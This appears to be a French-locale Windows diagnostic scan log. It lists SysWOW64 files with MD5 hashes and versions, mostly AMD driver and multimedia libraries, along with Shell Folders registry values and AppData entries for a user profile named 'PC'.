[MD5.36B80241F3CEA1AD8E84169AC836FDBD] - |A| - [26/02/2016 20:10:58] - (.Copyright (C) 2008 Advanced Micro Devices Inc. - ATI CAL runtime.) - [51 Ko] - (6.14.10.1848) - C:\Windows\SysWOW64\aticalrt.dll
[MD5.A334ACC87856179942EE156D9757B502] - |A| - [07/11/2014 11:27:06] - (.Copyright (C) 1998-2012 AMD Inc. - aticfx32.dll.) - [1208.2 Ko] - (8.17.10.1433) - C:\Windows\SysWOW64\aticfx32.dll
[MD5.EB4CAE86884B016E111DCF7831C671D4] - |A| - [26/02/2016 21:00:08] - (.Copyright (C) 1998-2011 AMD Inc. - atidxx32.dll.) - [10848.34 Ko] - (8.17.10.648) - C:\Windows\SysWOW64\atidxx32.dll
[MD5.A3EB8AD032F436B9BAE22362C105DD30] - |A| - [26/02/2016 20:04:08] - (.-.) - [142 Ko] - (0.0.0.0) - C:\Windows\SysWOW64\atieah32.exe
[MD5.BDAE67AFAC1FEEB94AF50697AA8C4430] - |A| - [26/02/2016 19:58:20] - (.Copyright (C) 2007 Advanced Micro Devices, Inc. - atigktxx.dll.) - [139 Ko] - (8.14.1.6489) - C:\Windows\SysWOW64\atigktxx.dll
[MD5.34D3499A909F0BB0199E1838F2DD2363] - |A| - [26/02/2016 19:58:28] - (.Copyright (C) 2007 Advanced Micro Devices, Inc. - atiglpxx.dll.) - [68.5 Ko] - (8.14.1.6489) - C:\Windows\SysWOW64\atiglpxx.dll
[MD5.76EF2CF17B1B85EECE6A8F3CB2A50C7F] - |A| - [26/02/2016 21:00:46] - (.Copyright (c) 2009 Advanced Micro Devices, Inc. - Radeon PCOM Universal Driver.) - [70.02 Ko] - (8.14.10.23) - C:\Windows\SysWOW64\atimpc32.dll
[MD5.8A18141FD3A4F2D3D99C8A69B0C38F0F] - |A| - [26/02/2016 20:09:02] - (.Copyright (C) 1998-2011 Advanced Micro Devices, Inc. - AMD OpenGL driver.) - [25235.5 Ko] - (6.14.10.13417) - C:\Windows\SysWOW64\atioglxx.dll
[MD5.64A0869F18560CD529120ADE00155C3E] - |A| - [07/11/2014 11:26:56] - (.-.) - [3.83 Ko] - (0.0.0.0) - C:\Windows\SysWOW64\atipblag.dat
[MD5.4DC78BCD6AC18DCD9C7E29B11560FA42] - |A| - [07/11/2014 11:27:39] - (.Copyright (C) 2007 Advanced Micro Devices, Inc. - atiu9pag.dll.) - [100.21 Ko] - (8.14.1.6489) - C:\Windows\SysWOW64\atiu9pag.dll
[MD5.B22066208623AF26BC1294BD403C8366] - |A| - [07/11/2014 11:27:45] - (.Copyright (C) 1998-2011 AMD Inc. - atiumdag.dll.) - [8961.84 Ko] - (9.14.10.1171) - C:\Windows\SysWOW64\atiumdag.dll
[MD5.336EE638483D10A366FB0154F2A59D04] - |A| - [26/02/2016 20:02:08] - (.-.) - [3390.02 Ko] - (0.0.0.0) - C:\Windows\SysWOW64\atiumdva.cap
[MD5.96E02BBBFDFEED7D053E9E496CED096F] - |A| - [07/11/2014 11:27:49] - (.Copyright (c) 2009 Advanced Micro Devices, Inc. - Radeon Video Acceleration Universal Driver.) - [7899.66 Ko] - (8.14.10.533) - C:\Windows\SysWOW64\atiumdva.dll
[MD5.0A66E021A883B1D00ED233CEE7620CE3] - |A| - [26/02/2016 21:00:32] - (.Copyright (C) 2007 Advanced Micro Devices, Inc. - atiuxpag.dll.) - [129.9 Ko] - (8.14.1.6489) - C:\Windows\SysWOW64\atiuxpag.dll
[MD5.7C163EDE63854539828F5B2C1BC529FD] - |A| - [07/11/2014 11:26:56] - (.-.) - [153.46 Ko] - (0.0.0.0) - C:\Windows\SysWOW64\ativvsva.dat
[MD5.219D7091DD1D93728392337FE9C7ADD6] - |A| - [07/11/2014 11:26:56] - (.-.) - [200.15 Ko] - (0.0.0.0) - C:\Windows\SysWOW64\ativvsvl.dat
[MD5.2FBD5126C7EECBAD70090A37693EA51D] - |A| - [05/08/2013 06:15:06] - (.-.) - [22.54 Ko] - (0.0.0.0) - C:\Windows\SysWOW64\bdmjpeg.dll
[MD5.4D2DAF31A931480527531392E86ED0AE] - |A| - [05/08/2013 06:15:10] - (.-.) - [64.55 Ko] - (0.0.0.0) - C:\Windows\SysWOW64\bdmpega.acm
[MD5.7A6ECDB70C6A9012506F800CAF795DC3] - |A| - [05/08/2013 06:15:08] - (.-.) - [64.55 Ko] - (0.0.0.0) - C:\Windows\SysWOW64\bdmpegv.dll
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:14] - [173 Ko] - C:\Windows\SysWOW64\bg-BG
[MD5.351607BF28E9F8942A06C61E52C54741] - |A| - [30/12/2014 16:12:37] - (.Copyright (C) 1994-2009, RAD Game Tools, Inc. - RAD Video Tools.) - [172 Ko] - (1.9.17.0) - C:\Windows\SysWOW64\binkw32.dll
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:14] - [0 Ko] - C:\Windows\SysWOW64\catroot
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:14] - [0 Ko] - C:\Windows\SysWOW64\catroot2
[MD5.D8F3FA69F2655BA4924F006FC23F5545] - |A| - [05/07/2015 20:48:55] - (.-.) - [52.31 Ko] - (0.0.0.0) - C:\Windows\SysWOW64\CCCInstall_201507052048556661.log
[MD5.4430011275FBC46AAAF271CA2BCCBFA2] - |A| - [17/01/2017 23:25:50] - (.-.) - [51.45 Ko] - (0.0.0.0) - C:\Windows\SysWOW64\CCCInstall_201701172325504540.log
[MD5.38718C4E864DC8F8E1DB0EF3B5566FA7] - |A| - [11/01/2015 14:26:53] - (.Copyright (C) 2004/05 Sony DADC Austria AG - SecuROM Context-Menu for Explorer..) - [174.61 Ko] - (1.1.221.0) - C:\Windows\SysWOW64\CmdLineExt_x64.dll
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:14] - [302.5 Ko] - C:\Windows\SysWOW64\com
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:14] - [208622.38 Ko] - C:\Windows\SysWOW64\config
[MD5.D41D8CD98F00B204E9800998ECF8427E] - |A| - [07/11/2014 11:59:57] - (.-.) - [0 Ko] - (0.0.0.0) - C:\Windows\SysWOW64\config.nt
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:14] - [219.5 Ko] - C:\Windows\SysWOW64\cs-CZ
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:14] - [216.5 Ko] - C:\Windows\SysWOW64\da-DK
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:14] - [240.5 Ko] - C:\Windows\SysWOW64\de-DE
[MD5.00000000000000000000000000000000] - |D| - [29/12/2014 22:08:57] - [0 Ko] - C:\Windows\SysWOW64\directx
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:14] - [4156 Ko] - C:\Windows\SysWOW64\Dism
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:14] - [3482.71 Ko] - C:\Windows\SysWOW64\drivers
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:14] - [1.09 Ko] - C:\Windows\SysWOW64\DriverStore
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:14] - [240.5 Ko] - C:\Windows\SysWOW64\el-GR
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:14] - [227.43 Ko] - C:\Windows\SysWOW64\en-US
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:14] - [230.5 Ko] - C:\Windows\SysWOW64\es-ES
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:14] - [160.5 Ko] - C:\Windows\SysWOW64\et-EE
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:14] - [218 Ko] - C:\Windows\SysWOW64\fi-FI
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 15:24:07] - [1680 Ko] - C:\Windows\SysWOW64\fr
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:14] - [37488.98 Ko] - C:\Windows\SysWOW64\fr-FR
[MD5.CFCD208495D565EF66E7DFF9F98764DA] - |A| - [09/04/2016 16:52:24] - (.-.) - [0 Ko] - (0.0.0.0) - C:\Windows\SysWOW64\fr.html
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 05:32:38] - [0 Ko] - C:\Windows\SysWOW64\FxsTmp
[MD5.9567BAAF6FEBF385AA3D27EEBD0AC876] - |A| - [26/02/2016 20:04:14] - (.-.) - [182 Ko] - (0.0.0.0) - C:\Windows\SysWOW64\GameManager32.dll
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:14] - [0 Ko] - C:\Windows\SysWOW64\GroupPolicyUsers
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:14] - [191.5 Ko] - C:\Windows\SysWOW64\he-IL
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:14] - [168 Ko] - C:\Windows\SysWOW64\hr-HR
[MD5.4A9F725429CA29913371A635A65A3899] - |A| - [26/02/2016 19:56:58] - (.-.) - [170.5 Ko] - (0.0.0.0) - C:\Windows\SysWOW64\hsa-thunk.dll
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:14] - [221 Ko] - C:\Windows\SysWOW64\hu-HU
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:14] - [36.27 Ko] - C:\Windows\SysWOW64\icsxml
[MD5.D8833BD9574E68EDB9B08EFDBB7C18C5] - |A| - [02/01/2009 19:35:56] - (.(c) 2008 - Denis Liégeois (mailto:denis. - Grec - Français version 2009.01.02 Keyboard Layout.) - [7 Ko] - (1.0.3.40) - C:\Windows\SysWOW64\kbdhefr2.dll
[MD5.23BA143A92033397B5BBB1AE80C38CD3] - |A| - [20/11/2014 21:35:00] - (.-.) - [38 Ko] - (0.0.0.0) - C:\Windows\SysWOW64\kdbsdk32.dll
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:14] - [162 Ko] - C:\Windows\SysWOW64\ko-KR
[MD5.C1B7AB03AC2F3C990A40BC2E18E02CF1] - |A| - [14/07/2009 02:35:50] - (.-.) - [11687.04 Ko] - (0.0.0.0) - C:\Windows\SysWOW64\korwbrkr.lex
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 05:32:38] - [0 Ko] - C:\Windows\SysWOW64\LogFiles
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:14] - [165 Ko] - C:\Windows\SysWOW64\lt-LT
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:14] - [166 Ko] - C:\Windows\SysWOW64\lv-LV
[MD5.00000000000000000000000000000000] - |D| - [07/11/2014 11:39:47] - [44639.48 Ko] - C:\Windows\SysWOW64\Macromed
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:14] - [1968.26 Ko] - C:\Windows\SysWOW64\manifeststore
[MD5.8585A7C52E34A14EFFE054673A01E39B] - |A| - [26/02/2016 20:22:56] - (.Copyright (C) 2013 AMD Inc. - Mantle loader.) - [111 Ko] - (9.1.10.99) - C:\Windows\SysWOW64\mantle32.dll
[MD5.206EAE2241385B07ED05EB5E77F6B2DF] - |A| - [26/02/2016 20:14:08] - (.Copyright (C) 2013 AMD Inc. - Mantle extension library.) - [87 Ko] - (9.1.10.99) - C:\Windows\SysWOW64\mantleaxl32.dll
[MD5.98071B6EE16AA76DABFF377A5DC69C86] - |A| - [14/07/2009 04:55:01] - (.-.) - [0.52 Ko] - (0.0.0.0) - C:\Windows\SysWOW64\mapisvc.inf
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:14] - [3211.43 Ko] - C:\Windows\SysWOW64\migration
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:14] - [32695.71 Ko] - C:\Windows\SysWOW64\migwiz
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:14] - [52.28 Ko] - C:\Windows\SysWOW64\Msdtc
[MD5.945E3EB5925F4EFC9F7467E684BF5BC6] - |A| - [30/12/2014 16:12:37] - (.Copyright (C) 1991-2013, RAD Game Tools, Inc. - Miles Sound System.) - [440 Ko] - (9.3.4.0) - C:\Windows\SysWOW64\mss32.dll
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:14] - [24.48 Ko] - C:\Windows\SysWOW64\MUI
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:14] - [212 Ko] - C:\Windows\SysWOW64\nb-NO
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:14] - [0 Ko] - C:\Windows\SysWOW64\NDF
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:14] - [51 Ko] - C:\Windows\SysWOW64\NetworkList
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:14] - [229 Ko] - C:\Windows\SysWOW64\nl-NL
[MD5.1C96B3DA6ABE5E18B63C64DF75884F6A] - |A| - [14/07/2009 02:35:50] - (.-.) - [1.45 Ko] - (0.0.0.0) - C:\Windows\SysWOW64\noise.kor
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:14] - [2566.05 Ko] - C:\Windows\SysWOW64\oobe
[MD5.D8796E7128875AC14C55E7983B02B66C] - |A| - [21/11/2014 02:33:06] - (.Copyright (C) 2011 Advanced Micro Devices Inc. - AMD Accelerated Parallel Processing OpenVideo 1.1 Runtime.) - [81.5 Ko] - (10.0.1642.5) - C:\Windows\SysWOW64\OpenVideo.dll
[MD5.68ED7249AE33371E3D830B8BEDCDB677] - |A| - [21/11/2014 02:33:02] - (.Copyright (C) 2011 Advanced Micro Devices Inc. - AMD Accelerated Parallel Processing OVDecode 1.1 Runtime.) - [71.5 Ko] - (10.0.1642.5) - C:\Windows\SysWOW64\OVDecode.dll
[MD5.B7795BC96C1CEB86E04E8DC843E9C784] - |A| - [10/06/2009 21:17:19] - (.-.) - [113.56 Ko] - (0.0.0.0) - C:\Windows\SysWOW64\PerfCenterCpl.ico
[MD5.41E7B8275D7AE1EEF4B5CCA6CC9C65BB] - |A| - [30/12/2014 16:10:48] - (.-.) - [1610.81 Ko] - (0.0.0.0) - C:\Windows\SysWOW64\PerfStringBackup.INI
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:14] - [224 Ko] - C:\Windows\SysWOW64\pl-PL
[MD5.B4EB68502E52EBDC0B2C55EA3445284C] - |A| - [07/11/2014 11:42:02] - (.-.) - [266.5 Ko] - (4.20.0.0) - C:\Windows\SysWOW64\pncrt.dll
[MD5.33833B3EDA1B07EBD367FA9B38B23E60] - |A| - [07/11/2014 11:42:03] - (.Copyright © 1995-1997, RealNetworks (tm), Inc. - 16 bit DirectX helper DLL.) - [6.5 Ko] - (5.0.0.0) - C:\Windows\SysWOW64\pndx5016.dll
[MD5.B74E422BC81236042529DC8A42A18423] - |A| - [07/11/2014 11:42:03] - (.Copyright © 1995-1997, RealNetworks (tm), Inc. - 32 bit DirectX helper DLL.) - [5.5 Ko] - (5.0.0.0) - C:\Windows\SysWOW64\pndx5032.dll
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 15:24:07] - [420.42 Ko] - C:\Windows\SysWOW64\Printing_Admin_Scripts
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:14] - [222.5 Ko] - C:\Windows\SysWOW64\pt-BR
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:14] - [224 Ko] - C:\Windows\SysWOW64\pt-PT
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:14] - [23.75 Ko] - C:\Windows\SysWOW64\ras
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:14] - [0.64 Ko] - C:\Windows\SysWOW64\Recovery
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 05:32:38] - [0 Ko] - C:\Windows\SysWOW64\restore
[MD5.53022EA6341241F1B86D7E6B738E48ED] - |A| - [07/11/2014 11:42:04] - (.Copyright © RealNetworks, Inc. 1998-2010 - Real Player(tm) ActiveX Control.) - [194.2 Ko] - (15.0.6.14) - C:\Windows\SysWOW64\rmoc3260.dll
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:14] - [169 Ko] - C:\Windows\SysWOW64\ro-RO
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:14] - [219 Ko] - C:\Windows\SysWOW64\ru-RU
[MD5.C6B5DB73870F6D6956977AA6C05AAC51] - |A| - [07/11/2014 11:29:05] - (.(c) 2006-2008 Sonic Focus, Inc. - SFFXComm.DLL.) - [59.5 Ko] - (1.0.0.42) - C:\Windows\SysWOW64\SFFXComm.dll
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:14] - [169.5 Ko] - C:\Windows\SysWOW64\sk-SK
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:14] - [166 Ko] - C:\Windows\SysWOW64\sl-SI
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 15:24:07] - [42.67 Ko] - C:\Windows\SysWOW64\slmgr
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:14] - [2803 Ko] - C:\Windows\SysWOW64\Speech
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:14] - [1142.37 Ko] - C:\Windows\SysWOW64\spp
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:14] - [30.19 Ko] - C:\Windows\SysWOW64\sppui
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:14] - [170 Ko] - C:\Windows\SysWOW64\sr-Latn-CS
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:14] - [216.5 Ko] - C:\Windows\SysWOW64\sv-SE
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 15:24:07] - [0 Ko] - C:\Windows\SysWOW64\sysprep
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:14] - [0 Ko] - C:\Windows\SysWOW64\Tasks
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:14] - [157 Ko] - C:\Windows\SysWOW64\th-TH
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:14] - [212.5 Ko] - C:\Windows\SysWOW64\tr-TR
[MD5.CC7C694B2BD1510C5AAE7374A5B52B92] - |A| - [03/02/1999 06:45:42] - (.-.) - [26.46 Ko] - (2.0.0.5215) - C:\Windows\SysWOW64\VBAFR32.OLB
[MD5.15BD0F8D507546F512EE5D73C3721FA8] - |A| - [14/07/2009 02:35:41] - (.Copyright © 2000 - vfpodbc.) - [20.05 Ko] - (1.0.2.0) - C:\Windows\SysWOW64\vfpodbc.dll
[MD5.4B0C0A8C960AF22761FB6A25D8A50DF2] - |RA| - [05/09/2008 00:22:01] - (.Copyright © 2000-3 ON2 Technologies - VP6 VIDEO FOR WINDOWS CODEC.) - [437.26 Ko] - (6.0.6.4) - C:\Windows\SysWOW64\vp6vfw.dll
[MD5.00000000000000000000000000000000] - |D| - [21/01/2017 14:26:18] - [237.33 Ko] - C:\Windows\SysWOW64\Wat
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:14] - [9089.97 Ko] - C:\Windows\SysWOW64\wbem
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 15:24:07] - [47.61 Ko] - C:\Windows\SysWOW64\WCN
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:14] - [88.24 Ko] - C:\Windows\SysWOW64\wdi
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 05:32:38] - [9079.89 Ko] - C:\Windows\SysWOW64\WindowsPowerShell
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 15:24:07] - [106.26 Ko] - C:\Windows\SysWOW64\winrm
[MD5.00000000000000000000000000000000] - |D| - [11/01/2015 14:24:48] - [131 Ko] - C:\Windows\SysWOW64\xlive
[MD5.8056EE9DEC33FF32434FCD394AC710CE] - |A| - [06/11/2009 10:58:04] - (.-.) - [174.78 Ko] - (0.0.0.0) - C:\Windows\SysWOW64\xlive.dll.cat
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 15:24:07] - [10.16 Ko] - C:\Windows\SysWOW64\XPSViewer
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:14] - [141.5 Ko] - C:\Windows\SysWOW64\zh-CN
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:14] - [63 Ko] - C:\Windows\SysWOW64\zh-HK
[MD5.00000000000000000000000000000000] - |D| - [14/07/2009 03:20:14] - [141.5 Ko] - C:\Windows\SysWOW64\zh-TW
[MD5.00000000000000000000000000000000] - |D| - [29/08/2016 21:45:21] - [1431.23 Ko] - C:\Windows\SysWOW64\_CIConfig

---------- | Shell Folders

[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"!Do not use this registry key"=Use the SHGetFolderPath or SHGetKnownFolderPath function instead   
"AppData"=C:\Users\PC\AppData\Roaming   [07/11/2014 11:06:49]
"Local AppData"=C:\Users\PC\AppData\Local   [07/11/2014 11:06:49]
"My Video"=C:\Users\PC\Videos   [07/11/2014 11:06:49]
"{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}"=C:\Users\PC\AppData\Roaming\Microsoft\Windows\Libraries   [07/11/2014 11:07:25]
"My Pictures"=C:\Users\PC\Pictures   [07/11/2014 11:06:49]
"Desktop"=C:\Users\PC\Desktop   [07/11/2014 11:06:49]
"History"=C:\Users\PC\AppData\Local\Microsoft\Windows\History   [07/11/2014 11:06:49]
"NetHood"=C:\Users\PC\AppData\Roaming\Microsoft\Windows\Network Shortcuts   [07/11/2014 11:06:49]
"{56784854-C6CB-462B-8169-88E350ACB882}"=C:\Users\PC\Favorites\Contacts   [07/11/2014 11:07:07]
"Cookies"=C:\Users\PC\AppData\Roaming\Microsoft\Windows\Cookies   [07/11/2014 11:06:49]
"Favorites"=C:\Users\PC\Favorites   [07/11/2014 11:06:49]
"SendTo"=C:\Users\PC\AppData\Roaming\Microsoft\Windows\SendTo   [07/11/2014 11:06:49]
"Start Menu"=C:\Users\PC\AppData\Roaming\Microsoft\Windows\Start Menu   [07/11/2014 11:06:49]
"My Music"=C:\Users\PC\Music   [07/11/2014 11:06:49]
"Programs"=C:\Users\PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs   [07/11/2014 11:06:49]
"Recent"=C:\Users\PC\AppData\Roaming\Microsoft\Windows\Recent   [07/11/2014 11:06:49]
"CD Burning"=C:\Users\PC\AppData\Local\Microsoft\Windows\Burn\Burn   [07/11/2014 11:07:42]
"PrintHood"=C:\Users\PC\AppData\Roaming\Microsoft\Windows\Printer Shortcuts   [07/11/2014 11:06:49]
"{7D1D3A04-DEBB-4115-95CF-2F29DA2920DA}"=C:\Users\PC\Searches   [07/11/2014 11:07:25]
"{374DE290-123F-4565-9164-39C4925E467B}"=C:\Users\PC\Downloads   [07/11/2014 11:06:49]
"{A520A1A4-1780-4FF6-BD18-167343C5AF16}"=C:\Users\PC\AppData\LocalLow   [07/11/2014 11:06:49]
"Startup"=C:\Users\PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup   [07/11/2014 11:07:25]
"Administrative Tools"=C:\Users\PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools   [07/11/2014 11:07:25]
"Personal"=C:\Users\PC\Documents   [07/11/2014 11:06:49]
"{BFB9D5E0-C6A9-404C-B2B2-AE6DB6AF4968}"=C:\Users\PC\Links   [07/11/2014 11:06:49]
"Cache"=C:\Users\PC\AppData\Local\Microsoft\Windows\Temporary Internet Files   [07/11/2014 11:06:49]
"Templates"=C:\Users\PC\AppData\Roaming\Microsoft\Windows\Templates   [07/11/2014 11:06:49]
"{4C5C32FF-BB9D-43B0-B5B4-2D72E54EAAA4}"=C:\Users\PC\Saved Games   [07/11/2014 11:06:49]
"Fonts"=C:\Windows\Fonts   [14/07/2009 03:20:09]

[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders]
"AppData"=%USERPROFILE%\AppData\Roaming   
"Cache"=%USERPROFILE%\AppData\Local\Microsoft\Windows\Temporary Internet Files   
"Cookies"=%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Cookies   
"Desktop"=%USERPROFILE%\Desktop   
"Favorites"=%USERPROFILE%\Favorites   
"History"=%USERPROFILE%\AppData\Local\Microsoft\Windows\History   
"Local AppData"=%USERPROFILE%\AppData\Local   
"My Music"=%USERPROFILE%\Music   
"My Pictures"=%USERPROFILE%\Pictures   
"My Video"=%USERPROFILE%\Videos   
"NetHood"=%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Network Shortcuts   
"Personal"=%USERPROFILE%\Documents   
"Programs"=%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs   
"Recent"=%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Recent   
"SendTo"=%USERPROFILE%\AppData\Roaming\Microsoft\Windows\SendTo   
"Startup"=%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup   
"Start Menu"=%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu   
"Templates"=%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Templates   
"{374DE290-123F-4565-9164-39C4925E467B}"=%USERPROFILE%\Downloads   
"PrintHood"=%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Printer Shortcuts   
"{56784854-C6CB-462B-8169-88E350ACB882}"=%USERPROFILE%\Favorites\Contacts   

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop"=C:\Users\Public\Desktop   [14/07/2009 03:20:08]
"Common Start Menu"=C:\ProgramData\Microsoft\Windows\Start Menu   [14/07/2009 03:20:08]
"CommonVideo"=C:\Users\Public\Videos   [14/07/2009 03:20:08]
"CommonPictures"=C:\Users\Public\Pictures   [14/07/2009 03:20:08]
"Common Programs"=C:\ProgramData\Microsoft\Windows\Start Menu\Programs   [14/07/2009 03:20:08]
"CommonMusic"=C:\Users\Public\Music   [14/07/2009 03:20:08]
"Common Administrative Tools"=C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools   [14/07/2009 05:32:38]
"Common Startup"=C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup   [14/07/2009 03:20:08]
"Common Documents"=C:\Users\Public\Documents   [14/07/2009 03:20:08]
"OEM Links"=C:\ProgramData\OEM Links   
"Common Templates"=C:\ProgramData\Microsoft\Windows\Templates   [14/07/2009 03:20:08]
"Common AppData"=C:\ProgramData   [14/07/2009 03:20:08]

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders]
"Common Desktop"=%PUBLIC%\Desktop   
"Common Documents"=%PUBLIC%\Documents   
"CommonPictures"=%PUBLIC%\Pictures   
"CommonMusic"=%PUBLIC%\Music   
"CommonVideo"=%PUBLIC%\Videos   
"{3D644C9B-1FB8-4f30-9B45-F670235F79C0}"=%PUBLIC%\Downloads   
"Common Start Menu"=%ProgramData%\Microsoft\Windows\Start Menu   
"Common Programs"=%ProgramData%\Microsoft\Windows\Start Menu\Programs   
"Common Startup"=%ProgramData%\Microsoft\Windows\Start Menu\Programs\Startup   
"Common AppData"=%ProgramData%   
"Common Templates"=%ProgramData%\Microsoft\Windows\Templates   

[HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop"=C:\Users\Public\Desktop   [14/07/2009 03:20:08]
"Common Start Menu"=C:\ProgramData\Microsoft\Windows\Start Menu   [14/07/2009 03:20:08]
"CommonVideo"=C:\Users\Public\Videos   [14/07/2009 03:20:08]
"CommonPictures"=C:\Users\Public\Pictures   [14/07/2009 03:20:08]
"Common Programs"=C:\ProgramData\Microsoft\Windows\Start Menu\Programs   [14/07/2009 03:20:08]
"CommonMusic"=C:\Users\Public\Music   [14/07/2009 03:20:08]
"Common Administrative Tools"=C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools   [14/07/2009 05:32:38]
"Common Startup"=C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup   [14/07/2009 03:20:08]
"Common Documents"=C:\Users\Public\Documents   [14/07/2009 03:20:08]
"OEM Links"=C:\ProgramData\OEM Links   
"Common Templates"=C:\ProgramData\Microsoft\Windows\Templates   [14/07/2009 03:20:08]
"Common AppData"=C:\ProgramData   [14/07/2009 03:20:08]

[HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders]
"Common Desktop"=%PUBLIC%\Desktop   
"Common Documents"=%PUBLIC%\Documents   
"CommonPictures"=%PUBLIC%\Pictures   
"CommonMusic"=%PUBLIC%\Music   
"CommonVideo"=%PUBLIC%\Videos   
"{3D644C9B-1FB8-4f30-9B45-F670235F79C0}"=%PUBLIC%\Downloads   
"Common Start Menu"=%ProgramData%\Microsoft\Windows\Start Menu   
"Common Programs"=%ProgramData%\Microsoft\Windows\Start Menu\Programs   
"Common Startup"=%ProgramData%\Microsoft\Windows\Start Menu\Programs\Startup   
"Common AppData"=%ProgramData%   
"Common Templates"=%ProgramData%\Microsoft\Windows\Templates   


---------- | [PC]

[07/11/2014 11:06:49] - |D| - [43392054471] - C:\Users\PC\AppData\Local
[07/11/2014 11:06:49] - |D| - [1681858] - C:\Users\PC\AppData\LocalLow
[22/05/2016 19:29:30] - |A| - [224795] - C:\Users\PC\AppData\Localtransition_5b549c4f9ca3915bf5b260f75bc27ce9.ini
[26/11/2014 13:59:28] - |A| - [220006] - C:\Users\PC\AppData\Localtransition_ab67b1881463470debe2731c93e8d9fe.ini
[07/11/2014 11:06:49] - |D| - [3507479023] - C:\Users\PC\AppData\Roaming
